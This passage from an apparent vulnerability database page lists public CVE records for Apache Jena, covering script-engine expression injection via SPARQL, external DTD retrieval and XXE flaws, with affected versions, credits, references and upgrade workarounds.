"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-07-12T07:49:55.432Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"related"
],
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22665"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/7hg0t2kws3fyr75dl7lll8389xzzc46z"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Apache Jena: Exposure of execution in script engine expressions.",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2023-32200",
"datePublished": "2023-07-12T07:49:55.432Z",
"dateReserved": "2023-05-04T12:49:34.610Z",
"dateUpdated": "2024-10-07T19:42:49.706Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-22665 (GCVE-0-2023-22665)
Vulnerability from nvd – Published: 2023-04-25 06:44 – Updated: 2025-02-13 16:44
VLAI?
Title
Apache Jena: Exposure of arbitrary execution in script engine expressions.
Summary
There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query.
Severity ?
No CVSS data available.
CWE
- CWE-917 - Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
Assigner
References
| URL | Tags | |
|---|---|---|
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Jena |
Affected:
0 , ≤ 4.7.0
(semver)
|
Credits
L3yx of Syclover Security Team
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T10:13:49.886Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/s0dmpsxcwqs57l4qfs415klkgmhdxq7s"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2023/07/11/11"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "4.7.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "L3yx of Syclover Security Team"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query."
}
],
"value": "There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-917",
"description": "CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement (\u0027Expression Language Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-07-11T20:06:23.134Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/s0dmpsxcwqs57l4qfs415klkgmhdxq7s"
},
{
"url": "http://www.openwall.com/lists/oss-security/2023/07/11/11"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Apache Jena: Exposure of arbitrary execution in script engine expressions.",
"workarounds": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Users not using custom scripted functions are advised to run Java17 or later with no script engine added to the deployment."
}
],
"value": "Users not using custom scripted functions are advised to run Java17 or later with no script engine added to the deployment."
}
],
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2023-22665",
"datePublished": "2023-04-25T06:44:21.516Z",
"dateReserved": "2023-01-05T14:41:04.515Z",
"dateUpdated": "2025-02-13T16:44:03.940Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-28890 (GCVE-0-2022-28890)
Vulnerability from nvd – Published: 2022-05-05 08:40 – Updated: 2024-08-03 06:10
VLAI?
Title
Processing external DTDs
Summary
A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities.
Severity ?
No CVSS data available.
CWE
- XML External DTD vulnerability
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Jena |
Affected:
Apache Jena , ≤ 4.4.0
(custom)
|
Credits
Apache Jena would like to thank Feras Daragma, Avishag Shapira & Amit Laish (GE Digital, Cyber Security Lab) for their report.
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T06:10:56.881Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "4.4.0",
"status": "affected",
"version": "Apache Jena",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Apache Jena would like to thank Feras Daragma, Avishag Shapira \u0026 Amit Laish (GE Digital, Cyber Security Lab) for their report."
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities."
}
],
"metrics": [
{
"other": {
"content": {
"other": "medium"
},
"type": "unknown"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "XML External DTD vulnerability",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-05-05T08:40:09",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Processing external DTDs",
"workarounds": [
{
"lang": "en",
"value": "Users are advised to upgrade to Apache Jena 4.5.0 or later."
}
],
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@apache.org",
"ID": "CVE-2022-28890",
"STATE": "PUBLIC",
"TITLE": "Processing external DTDs"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Apache Jena",
"version": {
"version_data": [
{
"version_affected": "\u003c=",
"version_name": "Apache Jena",
"version_value": "4.4.0"
}
]
}
}
]
},
"vendor_name": "Apache Software Foundation"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Apache Jena would like to thank Feras Daragma, Avishag Shapira \u0026 Amit Laish (GE Digital, Cyber Security Lab) for their report."
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": [
{
"other": "medium"
}
],
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "XML External DTD vulnerability"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878",
"refsource": "MISC",
"url": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878"
}
]
},
"source": {
"discovery": "UNKNOWN"
},
"work_around": [
{
"lang": "en",
"value": "Users are advised to upgrade to Apache Jena 4.5.0 or later."
}
]
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2022-28890",
"datePublished": "2022-05-05T08:40:09",
"dateReserved": "2022-04-09T00:00:00",
"dateUpdated": "2024-08-03T06:10:56.881Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-39239 (GCVE-0-2021-39239)
Vulnerability from nvd – Published: 2021-09-16 14:40 – Updated: 2024-08-04 02:06
VLAI?
Title
XML External Entity (XXE) vulnerability
Summary
A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.
Severity ?
No CVSS data available.
CWE
- XML External Entity (XXE) vulnerability
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Jena |
Affected:
unspecified , < 4.1.0
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T02:06:40.799Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E"
},
{
"name": "[announce] 20210916 CVE-2021-39239: Apache Jena: XML External Entity (XXE) vulnerability",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cannounce.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 Re: CVE-2021-39239 notifications for Jena 4.2.0",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45%40%3Cdev.jena.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 CVE-2021-39239 notifications for Jena 4.2.0",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d%40%3Cdev.jena.apache.org%3E"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "4.1.0",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server."
}
],
"metrics": [
{
"other": {
"content": {
"other": "high"
},
"type": "unknown"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "XML External Entity (XXE) vulnerability",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-09-21T09:06:18",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E"
},
{
"name": "[announce] 20210916 CVE-2021-39239: Apache Jena: XML External Entity (XXE) vulnerability",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cannounce.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 Re: CVE-2021-39239 notifications for Jena 4.2.0",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45%40%3Cdev.jena.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 CVE-2021-39239 notifications for Jena 4.2.0",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d%40%3Cdev.jena.apache.org%3E"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "XML External Entity (XXE) vulnerability",
"workarounds": [
{
"lang": "en",
"value": "Users are advised to upgrade to Apache Jena 4.2.0 or later."
}
],
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@apache.org",
"ID": "CVE-2021-39239",
"STATE": "PUBLIC",
"TITLE": "XML External Entity (XXE) vulnerability"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Apache Jena",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "4.1.0"
}
]
}
}
]
},
"vendor_name": "Apache Software Foundation"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": [
{
"other": "high"
}
],
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "XML External Entity (XXE) vulnerability"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E",
"refsource": "MISC",
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E"
},
{
"name": "[announce] 20210916 CVE-2021-39239: Apache Jena: XML External Entity (XXE) vulnerability",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d@%3Cannounce.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 Re: CVE-2021-39239 notifications for Jena 4.2.0",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45@%3Cdev.jena.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 CVE-2021-39239 notifications for Jena 4.2.0",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d@%3Cdev.jena.apache.org%3E"
}
]
},
"source": {
"discovery": "UNKNOWN"
},
"work_around": [
{
"lang": "en",
"value": "Users are advised to upgrade to Apache Jena 4.2.0 or later."
}
]
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2021-39239",
"datePublished": "2021-09-16T14:40:20",
"dateReserved": "2021-08-17T00:00:00",
"dateUpdated": "2024-08-04T02:06:40.799Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}